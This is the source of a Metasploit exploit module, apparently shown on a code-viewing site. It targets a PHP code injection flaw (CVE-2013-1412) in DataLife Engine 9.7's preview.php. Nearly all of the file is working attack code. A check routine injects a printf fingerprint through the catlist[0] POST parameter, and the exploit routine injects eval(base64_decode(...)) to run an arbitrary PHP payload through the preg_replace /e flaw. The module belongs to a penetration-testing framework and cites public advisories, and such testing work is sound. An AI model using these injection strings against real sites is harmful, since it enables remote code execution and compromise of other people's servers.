Path: blob/master/modules/exploits/unix/webapp/datalife_preview_exec.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'DataLife Engine preview.php PHP Code Injection',15'Description' => %q{16This module exploits a PHP code injection vulnerability DataLife Engine 9.7.17The vulnerability exists in preview.php, due to an insecure usage of preg_replace()18with the e modifier, which allows to inject arbitrary php code, when there is a19template installed which contains a [catlist] or [not-catlist] tag, even when the20template isn't in use currently. The template can be configured with the TEMPLATE21datastore option.22},23'Author' => [24'EgiX', # Vulnerability discovery25'juan vazquez' # Metasploit module26],27'License' => MSF_LICENSE,28'References' => [29[ 'CVE', '2013-1412' ],30[ 'OSVDB', '89662' ],31[ 'EDB', '24438' ],32[ 'BID', '57603' ],33[ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],34[ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]35],36'Privileged' => false,37'Platform' => ['php'],38'Arch' => ARCH_PHP,39'Payload' => {40'Keys' => ['php']41},42'DisclosureDate' => '2013-01-28',43'Targets' => [ ['DataLife Engine 9.7', {}], ],44'DefaultTarget' => 0,45'Notes' => {46'Reliability' => UNKNOWN_RELIABILITY,47'Stability' => UNKNOWN_STABILITY,48'SideEffects' => UNKNOWN_SIDE_EFFECTS49}50)51)5253register_options(54[55OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),56OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])57]58)59end6061def uri62normalize_uri(target_uri.path, 'engine', 'preview.php')63end6465def send_injection(inj)66res = send_request_cgi(67{68'uri' => uri,69'method' => 'POST',70'vars_post' =>71{72'catlist[0]' => inj73},74'cookie' => "dle_skin=#{datastore['TEMPLATE']}"75}76)77res78end7980def check81fingerprint = rand_text_alpha(4 + rand(4))8283res = send_injection("#{rand_text_alpha(4 + rand(4))}')||printf(\"#{fingerprint}\");//")8485if res and res.code == 200 and res.body =~ /#{fingerprint}/86return Exploit::CheckCode::Vulnerable87else88return Exploit::CheckCode::Safe89end90end9192def exploit93print_status("Exploiting the preg_replace() to execute PHP code")94res = send_injection("#{rand_text_alpha(4 + rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")95end96end979899